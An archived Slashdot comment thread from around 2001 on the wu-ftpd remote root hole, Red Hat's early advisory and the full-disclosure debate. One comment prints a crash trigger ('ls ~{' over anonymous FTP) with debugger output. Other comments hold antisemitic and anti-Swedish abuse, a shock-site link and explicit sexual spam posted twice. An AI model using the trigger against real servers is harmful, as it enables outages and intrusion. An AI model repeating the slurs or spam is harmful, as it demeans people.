Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Wu-ftpd Remote Root Hole

michael posted more than 12 years ago | from the taking-anonymous-access-a-little-too-literally dept.

Bug 515

Ademar writes: "A remote exploitable vulnerability was found in wu_ftp, which is distributed in all major distros. The CERT has a (private) list to coordinate this kind of disclosure so vendors can release updates together, but RH broke the schedule and released their advisory first. You can see the full advisory from securityfocus in bugtraq, but here is a quote: "This vulnerability was initially scheduled for public release on December 3, 2001. Red Hat pre-emptively released an advisory on November 27, 2001. As a result, other vendors may not yet have fixes available."" CNET has a story about this too.

cancel ×

515 comments

(n/t) (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2627982)

So what's wrong with that? (1, Redundant)

shoemakc (448730) | more than 12 years ago | (#2628059)

Further hipocracy on slashdot....

./ blasts MS whenever they try to keep a known exploit quiet for whatever reason, but then goes ahead and blasts Redhat for spilling the beans.

I thought the whole point of OS was so that you can make changes/fixes yourself? I'd rather go a week without a distro patch, then not know about the exploit at all. At least then i can disable the daemon, or impliment a kludge fix.

-Chris

second bukkake post (-1)

dead_puppy (532541) | more than 12 years ago | (#2628071)

As I said earlier on the site that Bukkake is from Japan. The term of Bukkake is not a sexual term at all. After this explanation of bukkake hopefully you will understand why the term is not and why it could be a sexual term and fetish. So let me get on to the explanation of this hot new fetish racing through the American continent.

Bukkake in Japanese is base form of a verb, as it stands alone it is a noun. Bukkake means splash or heavy squirt. This being said let me give you an example of this misunderstood word:

SIMPLE EXAMPLE: Japanese:
boku ha kanojo ni mizu wo bukkaketa.
I& nbsp; her water splashed English:
I splashed her with the water.

When adding something to the end of bukkake such as: ta (makes it past tense) te(command, such as do it) or teru(present) or tai(want to do)

With that being said you could say as well:
SIMPLE EXAMPLE: Japanese:
boku ha kanojo ni mizu wo bukkaketai
I& nbsp; her water want to splash English:
I want to splash her with the water.
Either way you know what bukkake means as a word. believe it or not Japan even has a soup called bukkake udon. That's how much of a normal word it is. This soup has nothing to do with sex at all. It is a soup that Japanese call bukkake because it makes the soup sound more appetizing. They put a lot of vegetables and liquid in the soup, and by calling it bukkake it gives the feeling that the soup was made quickly and its fresh. As if they splashed the soup together. So maybe that will give you more of an insight as to the meaning or feeling of the word as well. Now on the the sexual meaning of it.....
Sexual Definition and History of Bukkake:
Now that you know that bukkake is a term from Japan that means splash, let me tell you why it is a new sexual fetish. Around the late 80's early 90's a couple of video companies were trying to make videos that catered to facial and sperm lovers in Japan. So they decided to make videos that would consist of a girl getting facial after facial over and over again.There are many videos series and companies from Japan that do nothing but bukkake specific videos such as: Soft on Demand, Shuttle, M's video group, Deeps and a few more smaller companies (these videos are hard to find, but do exist). There are also a list of great sites and magazines that show this Japanese bukkake fetish such as: gotcum.com or the magazine Gal's shower. With this information you can do your own research as well as see examples to cure your own curiosity or sexual desire. After these Japanese companies did such extreme facial and cum play videos, pictures and websites; the world caught on like a bon fire in the Evergreen Forest. Now all countries around the world are trying to emulate what the Japanese have done with this new and exciting sexual fetish.There are many American videos out as well other great key players of bukkake media such as Germany or the U.K. Although these countries have tried to emulate the Japanese, nobody does quite like Japan. so far Japan has the most exciting and extreme bukkake out. The Japanese usually have a cute girl sit down in front of a line of up to 200 men. From there she awaits her huge sperm shower. These men repeatedly give her facial after facial. These is where the term bukkake is used because it is like they are splashing her with sperm!! This is not the usual facial you see at the end of a video but rather a shower of facials over and over again on a willing person. This is what makes the fetish a group project rather than just something that two people do together. With this being said, bukkake is not only a fetish but also a sort of orgy. If you would like to know the different types of bukkake click here. Now that the fetish on video has blown up so big there are many parties through out the U.S. being thrown by amateurs doing large bukkake parties. You can go to the yahoo groups and find many types of bukkake groups who throw parties all the time. Just do a little research and you are on your way to even being in one of these parties. You could be a giver or a receiver!!! Its up to you and it is no holds barred. So now you know exactly what bukkake means. The true meaning (in the sexual term) is to splash or squirt a large amount of sperm on a girl (or man, if you are gay) This being said you are well on your way to knowing more about this great phenomenon that is bukkake. Go out and have a good time....but please make sure before you do any parties to make sure everyone is tested for STD's (although they say that aids is difficult to pass through saliva or semen) Be sure to use your best judgment, or just join a site or buy videos and be completely safe.

There aren't really a lot of genres of Bukkake, but rather a different way or additions to them. Here is a simple list that I have came across in the past of this style of sex.

Forced Bukkake:
This is were a willing participant acts or seem unwilling to get a facial shower from several men. Bukkake Summit: Here is where a person receives a bukkake shower but tilts their head back and opens their mouth for the full experience, trying to catch it all. At the end of all the facials the cum is collected and drank by the target of the bukkake shower. Costume Play Bukkake: Here is where a party or video is made in a theme setting such as a girl wearing a schoolgirl uniform in a schoolroom. She would sit and suck off each guy in a line waiting. The men repeatedly cum in her mouth or face. Dream Shower Bukkake: This is where the group of men have sex with the target. As one man is having sex the other men watch and cum on the girls face. When the man comes to his climax he cums on her face and the next man in line has sex with her. This one can last a while depending on how many men the target is willing to have sex with.
Snowball or Trade Bukkake: This style of bukkake has two or more targets, which when receive facials swap the cum from mouth to mouth or lick it off of eat others faces. Cum Play Bukkake: Here is where many men cum on the girls face, after which she plays with the cum. Also the men cum on the girls food and the proceeds to eat the food with the sperm glazing.
The genre of Bukkake that I listed above are just a few. There are many more and there are many that are created everyday. You might want to check back to get new ideas on what can be done with bukkake. I will be listing more styles of bukkake in the future.

fp (0, Offtopic)

Anonymous Coward | more than 12 years ago | (#2627986)

Have a nice day!

Re:fp (0)

Anonymous Coward | more than 12 years ago | (#2628116)

You think that's bad, check this [mybc.com] out.

Nice. (1, Flamebait)

Anonymous Coward | more than 12 years ago | (#2627987)

Someone at RedHat's got their business thinking cap on.

Release a fix that no one else is able to yet and tell the world how to exploit the hole.

Crush the competition while they sleep.

Re:Nice. (2, Insightful)

Wells2k (107114) | more than 12 years ago | (#2628002)

Perhaps, but think of it in another way. Redhat is trying to protect their own customers by producing and releasing a fix as soon as possible. The fact that other distributers are falling behind on this mark is truly not their fault.


You don't see Microsoft doing this, do you? :)

Re:Nice. (0)

Anonymous Coward | more than 12 years ago | (#2628012)

Hey, I'm all for crushing competition. Microsoft does it a lot better than other companies.

Re:Nice. (5, Interesting)

dlek (324832) | more than 12 years ago | (#2628028)

According to the CNET article [cnet.com] , Red Hat did this by mistake, and they apologized.

I'm somewhat surprised--but either way it brings the unresolved question of disclosure bubbling to the froth again.

Re:Nice. (5, Troll)

Pxtl (151020) | more than 12 years ago | (#2628048)

Plus, its pretty bad since whenever micorosoft gets something like this, people get pissed off if they take more then a weekend on it. Here, they took almost a week longer then RedHat, makes you wonder how long this sploit was in hacker circles, and how long the distros knew about it. Whatever happened to the claims of fast reaction in the opensource industry vs. old-skool business?

This isn't a troll, but an honest question - what tookem so long, and why didn't they just throw it open to end-users to protect themselves (like closing down ftps in worst-case) like is supposed to be standard practice?

Re:Nice. (0)

Anonymous Coward | more than 12 years ago | (#2628057)

Redhat utilized sound business thinking instead of subjugating itself to the socialist groupthink typical of the militant Linxen factions. Can't blame them when there are still idiots who argue over the proper usage of "GNU/Linux".

Re:Nice. (0)

Anonymous Coward | more than 12 years ago | (#2628073)

That's not why they did it. They obviously did it to damage the competition. They just opened up a superbig hole in other distributions as soon as they themselves were no longer vulnerable. I just hope that next time it's someone else doing it to them.

Re:Nice. (-1, Flamebait)

Reikk (534266) | more than 12 years ago | (#2628130)

Luckily, most people are not vulnerable to attack due to the fact that their systems have been down now for several days due to filesystem corruption in the kernel.

Linux is written by a bunch of elitist developers who refuse to debug and test their code. Their idea of quality control is releasing software first, then seeing if people who use it have any problems. This "my shit don't stink" elitist attitude will be the fall of Linux.

Down with Linus and all swedish people!

Fuck micheal (-1)

Ralph JewHater Nader (450769) | more than 12 years ago | (#2627991)

He is the worst editor on Slashshit. He is probably Jewish. Burn in hell asshole!

Wu-FTP not in OpenBSD (3, Interesting)

Geekboy(Wizard) (87906) | more than 12 years ago | (#2627992)

Wu-FTP is not in OpenBSD, and ftp is disabled by default. Wu-FTP is not included with all major distributions, but possibly in Linux ones.

You're a nit. You're a nit. Here's another one!

Re:Wu-FTP not in OpenBSD (0)

alexborges (313924) | more than 12 years ago | (#2628047)

BLAM! Offtopic..... Linux is not UNIX (LNU..;)..BSD is...

Re:Wu-FTP not in OpenBSD (0)

Anonymous Coward | more than 12 years ago | (#2628083)

Also, Wu-FTP is not included in MS-DOS, DR-DOS, OS/2 or CP/M.

Re:Wu-FTP not in OpenBSD (0)

Anonymous Coward | more than 12 years ago | (#2628091)

Or goatse.cx [goatse.cx] for that matter.

Re:Wu-FTP not in OpenBSD (1, Funny)

Anonymous Coward | more than 12 years ago | (#2628141)

although it would certainly fit in there

Re:Wu-FTP not in OpenBSD (0)

Anonymous Coward | more than 12 years ago | (#2628162)

Also, wu-ftp was never included in ENIAC, COLOSSUS, or ENIGMA. Even though the Internet gets set back hard by this exploit, Adolf Hitler is safe with a system that makes OpenBSD look like a sieve.

I've changed my mind (5, Interesting)

child_of_mercy (168861) | more than 12 years ago | (#2627996)

Would have been nice to give the maintainers on a few other distro's time to close the hole before broadcasting this to the script kiddies

Until 5 mins ago I was a beleiver in complete disclosure,

But with 6 wu-ftpd boxes to admin I'm not so sure any more.

Hope I see a fix today.

Re:I've changed my mind (0)

Anonymous Coward | more than 12 years ago | (#2628031)

Until 5 mins ago I was a beleiver in complete disclosure,
But with 6 wu-ftpd boxes to admin I'm not so sure any more.


More evidence for my theory that everyone in the world is a hypocrite.

Re:I've changed my mind (4, Insightful)

child_of_mercy (168861) | more than 12 years ago | (#2628103)

To paraphrase Keynes:

"When the facts change, I change my mind. What do you do?"


Seriously?

Re:I've changed my mind (2)

compwizrd (166184) | more than 12 years ago | (#2628035)

There WAS a "please contact us at wuftpd so we can co-ordinate", sent out on the 17th, if i got the date right.

Re:I've changed my mind (2)

compwizrd (166184) | more than 12 years ago | (#2628097)

http://www.securityfocus.com/archive/1/241105 is the link, just looked it up. Was on the 19th, close enough.

And what's with the broken counter on replies on slashdot? It claims it was 14 seconds ago that i replied.. I'm sure i didn't find and type the above paragraph, in a mere 14 seconds.

Re:I've changed my mind (0)

Anonymous Coward | more than 12 years ago | (#2628044)

one word:
PROftpd

http://www.proftpd.org

learn it.
use it.
save your self a LOT of time.

-red5

Re:I've changed my mind (1, Informative)

Anonymous Coward | more than 12 years ago | (#2628082)

sorry but the script kiddies had this for weeks now.

Why do you have to be so pompus to think that you are told about an exploit before a baddie has it...

a BADDIE uses it that's how it is discovered nimrod.

Re:I've changed my mind (2, Insightful)

Cato the Elder (520133) | more than 12 years ago | (#2628098)

I haven't.

It's not like only Redhat distro users can now get a safe version of wu_ftpd--it's just that not everyone (neccessarily) has the packages ready for all there configurations.

If you have 6 boxes, better start checking versions and installing newer ones. Sure it sucks, but it's better than being surprised when your servers are "owned"

Re:I've changed my mind (4, Flamebait)

andrewski (113600) | more than 12 years ago | (#2628119)

The script kiddies probably knew about this long before CERT did. This is the major problem with private bug lists for vendors; It gives script kiddies a while to continue exploiting boxes while the vendors prepare patches. I would rather know right away, disable FTP, and do without for a few days, than wait until the bug was fixed before I am informed. Private lists, like all other forms of security by obscurity, are inherently ineffective.

Re:I've changed my mind (2)

Schwarzchild (225794) | more than 12 years ago | (#2628163)

That's why I recommend not using WU-FTP. It's full of holes! Like swiss cheese. About as bad as Sendmail. Use something more secure.

first poop (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2628000)

first poop

linuxtoday.com (2, Interesting)

jonsmirl (114798) | more than 12 years ago | (#2628001)

Is this how Linuxtoday was just hacked?

My favorite quote (3, Interesting)

Reality Master 101 (179095) | more than 12 years ago | (#2628003)

The problem, known in security circles as the wu-FTP Globbing Heap Corruption Vulnerability, allows attackers to get remote access to all files on a server, provided they can access the FTP service.

Whew! Your whole system is only wide open if you can access the FTP service. That makes me feel better!

Re:My favorite quote (2)

mattdm (1931) | more than 12 years ago | (#2628046)

That's not so unreasonable. The vast majority of boxes have little reason to run an ftp server -- it should be disabled on most machines anyway. (scp/sftp is a good alternative in many cases, and of course there's always http, which, although there's obviously lots of potential for problems there, at least isn't such a pain with firewalls).

Re:My favorite quote (2)

csbruce (39509) | more than 12 years ago | (#2628077)

Your whole system is only wide open if you can access the FTP service.

That's not a problem to me, as I would never expose an FTP port to the outside world. The FTP protocol is inherently difficult to secure and it has outlasted its usefulness. For outgoing data, you can just use HTTP. And public access for incoming data just means that you will be hosting gigs of ripped movies and porn. FTP should be filtered at the firewall and made available to trusted hosts only.

Re:My favorite quote (0)

Anonymous Coward | more than 12 years ago | (#2628127)

The full paragraph is as follows (my emphasis):

The problem, known in security circles as the wu-FTP Globbing Heap Corruption Vulnerability, allows attackers to get remote access to all files on a server, provided they can access the FTP service. Since most such servers provide anonymous access to anyone on the Internet, a great number will be vulnerable.

They obviously make it clear that most ftp servers are vulnerable. If you are going to be a smart-ass at least say something useful!

just another reason (0)

Anonymous Coward | more than 12 years ago | (#2628005)

just another reason why red hat rocks!

A non-microsoft security bug? (1)

barfy (256323) | more than 12 years ago | (#2628006)

Say it isn't so. A bug that potentially exposes thousands or millions of machines on the net to root access?

Re:A non-microsoft security bug? (1)

kraig (8821) | more than 12 years ago | (#2628053)

not like this hasn't happened with wu before, or sendmail, or bind, or...

Re:A non-microsoft security bug? (0)

Anonymous Coward | more than 12 years ago | (#2628108)

Only those sites who's administrators failed to move away from wu-ftpd (as ANY consultant will tell you).


Just as you should never consider using IIS for an important web server, you should never use wu-ftpd on an important ftp server.

first post??? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2628007)

I claim this post for Queen Elizabeth!!!!!

Red Hat (0)

Anonymous Coward | more than 12 years ago | (#2628008)

It's not suprising that Red Hat would do such a thing.

First reply to mention Microsoft. -1 redundent (0)

Anonymous Coward | more than 12 years ago | (#2628009)


What no snide comment like when a MS exploit is released?

If this was MS, they wouldn't have told us.

etc.

CERT and private lists (5, Interesting)

SClitheroe (132403) | more than 12 years ago | (#2628011)

You all bashed Microsoft the last time around for not immediately and publicly notifying users of an exploit, they, prefering instead to ready a fix before the exploit was common knowledge.

So, once again use an occasion such as this to resoundingly denounce the fact the CERT, and major Linux distros other than Red Hat, have chosen to do the essentially same.

I suspect that the complaints of this type of behavior will be much less in the case of CERT, since Microsoft's disclosure policies simply allow slashdotters to take pot shots at MS, but we'll see...The shoe's on the other foot this time.

Re:CERT and private lists (1)

Wells2k (107114) | more than 12 years ago | (#2628038)

The point here is that, when Microsoft has a fix for something that is broken with their software, they are the only distributers of that software. With WU FTP, there are multiple distributers using the software.

Not that I think Redhat is wrong here. They released a security fix for their software as soon as they could, thus protecting their customer base.

This should have been public knowledge... (3, Insightful)

Brendan Byrd (105387) | more than 12 years ago | (#2628072)

Well, I'll bash MS, and I'll bash the GNU and Linux guys for the same thing. Why was this not released SOONER?

The people who would really use the exploit already know about it in their cracker circles, so why are we limiting the public in this knowledge? Just tell us and we'll shut down the FTPs or temporarily switch the access to a different daemon while you write a patch for it.

Again, this is security by obsurity, and shame on the OSS community for trying to hide it!

Whats ethical? (3, Insightful)

L-Wave (515413) | more than 12 years ago | (#2628016)

This raises the question of ethics, is it more ethical to keep quiet about a hole in software that people run / store important data until its fixed, or is it ethical to tell the public in which case the people affected become "more" vulnerable?

Personally, i would rather be told of the hole, and advised to turn off the daemon, as opposed to running the daemon and not knowing about the hole.....some people think ignorance is bliss.....not me. =)

The customer is always right (2)

KarmaBlackballed (222917) | more than 12 years ago | (#2628160)

Do all hackers notify CERT first? (How many quiet hackers already found this one?)

Once a company has a fix they owe their customers that fix. Anything less is a compromise of their customer's security and risks tarnishing their trust. Yes, getting a fix out first does matter.

Red Hat did the right thing. If your distro has not put out a fix yet, are they working fast enough? (You think there were no script kiddies out there before Red Hat "broke the news?")

Wu-pps (1)

actappan (144541) | more than 12 years ago | (#2628018)

Isn't the whole idea of CERT to prevent somone from leaking out potential dangerous information before everyone is ready to address it? Even if there's a hole - the relative breadth of the knowledge is going to be limited until a public release - and if no one else has caught up yet . . .well then thats bad.

I would comdem RH - but I use their products and I have Wu installed on some of my systems (They're all internal - so don't even think about it). I'm glad I'll have the fix.

Re:Wu-pps (1)

Software (179033) | more than 12 years ago | (#2628085)

I would comdem RH - but I use their products and I have Wu installed on some of my systems (They're all internal - so don't even think about it). I'm glad I'll have the fix.
Don't think that because your systems are internal, they are safe. I'm in charge of administrating about 10 machines, and others in my group each administered about 3. Not one of these machines is accessible outside the company. When Code Red came-a-knocking, guess how many unpatched systems got it? That's right, all of them. People got infected on their home machines, then connected via VPN to the company network and BAM!

I would strongly recommend that anyone running wu-ftpd update their systems ASAP. It sounds like you will. Others won't, and will get rooted.

Redhat (0, Flamebait)

gregRowe (173838) | more than 12 years ago | (#2628019)

Is redhat becoming the MS of Linux distros? That isn't very cool of them to release early. I am sure they were under no obligation to wait but it certainly doesn't seem "polite".

Re:Redhat (2)

Todd Knarr (15451) | more than 12 years ago | (#2628086)

It wouldn't be very cool of them to leave me vulnerable to a break-in when the fix is available. And the fix is available in the wu-ftpd package, regardless of whether the various distributors have packaged it for their systems, so I can install the fix even if my vendor hasn't gotten it's act together.

My whole complaint with the non-full-disclosure movement is that vendors under it tend to not acknowledge that security holes exist (which means I can't even do something as simple as disable the vulnerable service until a fix is out) and delay putting patches out (so I'm either vulnerable or off the air longer than needed). I'd be more annoyed at CERT for not reporting the vulnerability than at RedHat for telling me about it.

Re:Redhat (1)

gregRowe (173838) | more than 12 years ago | (#2628105)

Good point. After thinking about it more I agree with you.

Another globbing bug? (2, Flamebait)

Hiro Antagonist (310179) | more than 12 years ago | (#2628024)

AIRC, this type of exploit has been the bane of WuFTPD's existance; one of the reasons I switched to ProFTPD [proftpd.net] some time ago. Much better security history.

Besides; if you're running a public FTP and it's not in a chroot jail, you are a moron anyways.

Example of the bug ... (-1)

Anomymous Coward (303315) | more than 12 years ago | (#2628133)

For everyone who wants to see how it works ...
Simple glob overflow, by adding special characters ( { or [ ) to the end of a request . This provides a way to slip, and execute, shell code onto the heap ... :

ftp> open localhost
Connected to localhost (127.0.0.1).
220 host FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection

1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd: host:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136 3136 in malloc.c


Fun stuff. It's been on the freebsd security list since a few days ago.

Re:Another globbing bug? (5, Interesting)

LS (57954) | more than 12 years ago | (#2628158)

Ok, so what level of security on someone's box makes them no longer a moron? Is there a canonical list of things I must do to secure a box so that I am no longer a moron? To be honest, I run my own box for personal use, and learning anything more than basic security takes more time than it's worth. Please let me know where I can go to learn what it takes to build a secure box as defined by non-moron security experts.

LS

Red Hat's motivations? (0, Flamebait)

code addict (312283) | more than 12 years ago | (#2628025)

The guys at Red Hat sure are jerks. I guess you can always depend on companies to look out for number 1 first, and screw everyone else whenever possible!

Re:Red Hat's motivations? (0)

Anonymous Coward | more than 12 years ago | (#2628079)

So I assume that you prefer your server to be assraped a few more times while you wait for the "popular patch" to be released by a "non-corporate entity". Dumbass.

Repeat of a previous security hole? (1)

Geekboy(Wizard) (87906) | more than 12 years ago | (#2628026)

IIRC, there was a security hole almost exactly like this one in several other FTP servers. Why didn't Wu-FTP (and the distro's) evaluate the code for it then?

Why should they wait? (2)

imrdkl (302224) | more than 12 years ago | (#2628030)

Playing the waiting game with the rest of the crowd could possibly increase Redhat's eventual liability to their own customers, even if it was the right thing to do.

Business is business.

Re:Why should they wait? (1)

Narril Duskwalker (530445) | more than 12 years ago | (#2628070)

Becuase by not waiting they have giving more amunition to the FUD machine. Maybe not waiting was the best thing for RH, but it certainly wasn't the best thing for linux.

Re:Why should they wait? (0)

Anonymous Coward | more than 12 years ago | (#2628113)

To quote myself, "Fuck the community". Linux is stronger today because one company stepped forward as the standard Linux distribution. It was pure greed and capitalism that brought this to the front, not some vague concept of community or honor or Freedom or any of that other claptrap that the rest of the OS movement wants to lead you to believe in.

The original poster hit it right on the head. Business is business. There isn't any reason to let your competitors compete if you it doesn't help you.

Kill them early and kill them quickly.

There is no money to be made catering to your competitors.

Re:Why should they wait? (1)

imrdkl (302224) | more than 12 years ago | (#2628115)

Well, RH is not linux. And neither is WU-FTPD.

that;s the beauty.. (2)

Lumpy (12016) | more than 12 years ago | (#2628032)

if you have a clue you can have the fix now.
download the sources and install. simple and effective.

Hiding the fact there's is a security flaw only gives the black hats that much more time to use the exploit un-noticed.

It's time to thow out the "leaders" in this industry and start replacing them with men and women with scruples.

Magic Lantern... (2, Offtopic)

cperciva (102828) | more than 12 years ago | (#2628033)

Am I the only person thinking that strategically placed "dumb coding mistakes" might be the real story behind Magic Lantern?

Re:Magic Lantern... (0)

Anonymous Coward | more than 12 years ago | (#2628106)

Yes.

Just like MS. (0)

Anonymous Coward | more than 12 years ago | (#2628039)

I bet that this is how MS feels when people disclose their security holes before a fix.

wu-ftpd has had lots of security issues (1)

GeorgieBoy (6120) | more than 12 years ago | (#2628045)

You should be using ProFTPD [proftpd.net] anyway.

WuFTPD has poor security history (2)

augustz (18082) | more than 12 years ago | (#2628049)

My god, the security history of wu is pretty bad. I wish vendors would ship default network services with an eye towards proven servers that were designed with security in mind.

Wu-ftp/BIND/Sendmail does NOT make me confident.

And quit carping on RedHat, probably just an error, and this bug was reported to ALL the vendors some time ago.

important info about wu_ftp and bukkake (-1)

dead_puppy (532541) | more than 12 years ago | (#2628050)

As I said earlier on the site that Bukkake is from Japan. The term of Bukkake is not a sexual term at all. After this explanation of bukkake hopefully you will understand why the term is not and why it could be a sexual term and fetish. So let me get on to the explanation of this hot new fetish racing through the American continent.

Bukkake in Japanese is base form of a verb, as it stands alone it is a noun. Bukkake means splash or heavy squirt. This being said let me give you an example of this misunderstood word:

SIMPLE EXAMPLE: Japanese:
boku ha kanojo ni mizu wo bukkaketa.
I& nbsp; her water splashed English:
I splashed her with the water.

When adding something to the end of bukkake such as: ta (makes it past tense) te(command, such as do it) or teru(present) or tai(want to do)

With that being said you could say as well:
SIMPLE EXAMPLE: Japanese:
boku ha kanojo ni mizu wo bukkaketai
I& nbsp; her water want to splash English:
I want to splash her with the water.
Either way you know what bukkake means as a word. believe it or not Japan even has a soup called bukkake udon. That's how much of a normal word it is. This soup has nothing to do with sex at all. It is a soup that Japanese call bukkake because it makes the soup sound more appetizing. They put a lot of vegetables and liquid in the soup, and by calling it bukkake it gives the feeling that the soup was made quickly and its fresh. As if they splashed the soup together. So maybe that will give you more of an insight as to the meaning or feeling of the word as well. Now on the the sexual meaning of it.....
Sexual Definition and History of Bukkake:
Now that you know that bukkake is a term from Japan that means splash, let me tell you why it is a new sexual fetish. Around the late 80's early 90's a couple of video companies were trying to make videos that catered to facial and sperm lovers in Japan. So they decided to make videos that would consist of a girl getting facial after facial over and over again.There are many videos series and companies from Japan that do nothing but bukkake specific videos such as: Soft on Demand, Shuttle, M's video group, Deeps and a few more smaller companies (these videos are hard to find, but do exist). There are also a list of great sites and magazines that show this Japanese bukkake fetish such as: gotcum.com or the magazine Gal's shower. With this information you can do your own research as well as see examples to cure your own curiosity or sexual desire. After these Japanese companies did such extreme facial and cum play videos, pictures and websites; the world caught on like a bon fire in the Evergreen Forest. Now all countries around the world are trying to emulate what the Japanese have done with this new and exciting sexual fetish.There are many American videos out as well other great key players of bukkake media such as Germany or the U.K. Although these countries have tried to emulate the Japanese, nobody does quite like Japan. so far Japan has the most exciting and extreme bukkake out. The Japanese usually have a cute girl sit down in front of a line of up to 200 men. From there she awaits her huge sperm shower. These men repeatedly give her facial after facial. These is where the term bukkake is used because it is like they are splashing her with sperm!! This is not the usual facial you see at the end of a video but rather a shower of facials over and over again on a willing person. This is what makes the fetish a group project rather than just something that two people do together. With this being said, bukkake is not only a fetish but also a sort of orgy. If you would like to know the different types of bukkake click here. Now that the fetish on video has blown up so big there are many parties through out the U.S. being thrown by amateurs doing large bukkake parties. You can go to the yahoo groups and find many types of bukkake groups who throw parties all the time. Just do a little research and you are on your way to even being in one of these parties. You could be a giver or a receiver!!! Its up to you and it is no holds barred. So now you know exactly what bukkake means. The true meaning (in the sexual term) is to splash or squirt a large amount of sperm on a girl (or man, if you are gay) This being said you are well on your way to knowing more about this great phenomenon that is bukkake. Go out and have a good time....but please make sure before you do any parties to make sure everyone is tested for STD's (although they say that aids is difficult to pass through saliva or semen) Be sure to use your best judgment, or just join a site or buy videos and be completely safe.

People still trust Wu-ftpd? (4, Informative)

Azar (56604) | more than 12 years ago | (#2628055)

I gave wu-ftpd the boot ages ago. I can't understand why people would still trust this buggy, bloated "just asking for trouble" piece of software. There are better alternatives.

PureFTPD (based on TrollFTPD)
ftpd-BSD (port from OpenBSD)
Virtual FTPD (based on ftpd-BSD)

are all good examples of decent alternatives. I've even heard good things about vsftpd.

Some people (myself not included) even consider ProFTPD to be a viable alternative.

How can people still trust software that has had more holes in it then the finest Swiss Cheese?!

Please Explain, dude(ttes)... (1)

A_Non_Moose (413034) | more than 12 years ago | (#2628058)

Slackware is conspicuously absent from the list, is it not vulnerable? Or just not listed?

The title brought back a question I've had for a while:
the vulnerability: Wu-Ftpd File Globbing Heap Corruption Vulnerability

I've never been able to figure out in laymans terms, much less technical terms WTF globbing is?

Oh, and while smarter people than I are explaining...the quote at the bottom (the one I see)...what is a Vegemite?
Ever since that Men at Work song, I've wondered.

Re:Please Explain, dude(ttes)... (0)

Anonymous Coward | more than 12 years ago | (#2628094)

Slackware 8.0 comes with ProFTPd instead of wu.ftpd... that's why.

Re:Please Explain, dude(ttes)... (3, Informative)

Anonymous DWord (466154) | more than 12 years ago | (#2628123)

http://www.tuxedo.org/~esr/jargon/html/entry/glob. html

[Unix;common] To expand special characters in a wildcarded name, or the act of so doing (the action is also called `globbing').

Re:Please Explain, dude(ttes)... (2)

Wee (17189) | more than 12 years ago | (#2628136)

I've never been able to figure out in laymans terms, much less technical terms WTF globbing is?

I real basic terms, to glob is to expand a wildcard character to mean one or more characters. Like if you say something like "sudo rm -rf /*" that asterisk is expanded to mean "zero or more of any character". You might have also seen the question mark used. It means one single character. The Foldoc web site [ic.ac.uk] has a much better explanation.

Oh, and while smarter people than I are explaining...the quote at the bottom (the one I see)...what is a Vegemite? Ever since that Men at Work song, I've wondered.

Vegemite is a nasty product made of yeast extract. It's a brownish paste-like stuff which is spread on bread and the like. An Aussie could probably explain better. I tasted it just once (on a cracker), and that was enough for me.

-B

Re:Please Explain, dude(ttes)... (1)

captin nod (517564) | more than 12 years ago | (#2628140)


Vegemite [vegemite.com.au] is a traditional aussie sandwich spread extracted from the yeasty remains left over from making beer.

some people love it, some people hate it.

Slackware uses ProFTPd (0)

Anonymous Coward | more than 12 years ago | (#2628147)

Slackware ships with ProFTPd, if i remember correctly...

Why use Wu-ftpd (2, Informative)

niekze (96793) | more than 12 years ago | (#2628061)

I'm not a security expert by any means, but...here is my list of horrible things to run:

1. sendmail
2. bind 8
3. Wu-ftpd.

There are replacements for each. Djbdns will give you $500 (IIRC) if you find an exploitable bug in their code. Proftpd, lukemftp, and the bsdftpd are all *much* better replacements for Wu-Ftpd. Sendmail...i can't remember, but there are replacements.

Nevertheless, bind should be run in a chroot jail. Doing things like that makes a bind hole useless. Please uninstall Wu-ftpd and use a replacement. Finally, if you don't need to run it, DON'T!

Qmail is a good replacement for sendmail (1)

HappyOscar (65200) | more than 12 years ago | (#2628125)

For what it's worth.

Check it! [qmail.org]

most recent story??? (1)

-audiowhore- (153163) | more than 12 years ago | (#2628066)

wow....
this is hard to believe. /. running a story only 1 day after the vulnerability was announced?? :)
-- audiowhore

CERT? Bah... go screw yourself! (0)

Anonymous Coward | more than 12 years ago | (#2628068)

FUCK CERT and their private list. People deserve to know this stuff when it happens.

how would you exploit this, though? (3, Insightful)

tim_maroney (239442) | more than 12 years ago | (#2628075)

The attacker must ensure that a maliciously constructed malloc header containing the target address and it's replacement value are in the right location in the uninitialized part of the heap. The attacker must also place shellcode in server process memory.

Color me stupid, but that doesn't sound too feasible for a remote hack. How would you muck with the malloc heap this way? DoS, maybe, but unless there's something I'm missing, not too great for root access. Let me know if there's something I'm missing.

Tim

Re:how would you exploit this, though? (1)

Atilla (64444) | more than 12 years ago | (#2628153)

hear hear.

This is not a fucking skript kiddie quick hack.

The exploit seems to require a great deal of preparation, in-depth knowledge of software, and some other form of access to the target host.

this doesn't even closely compare to IIS holes which could be exploited by your grandma. If you're a true BOFH, you shouldn't have any trouble with this hole, because you've already disabled wu-ftpd.

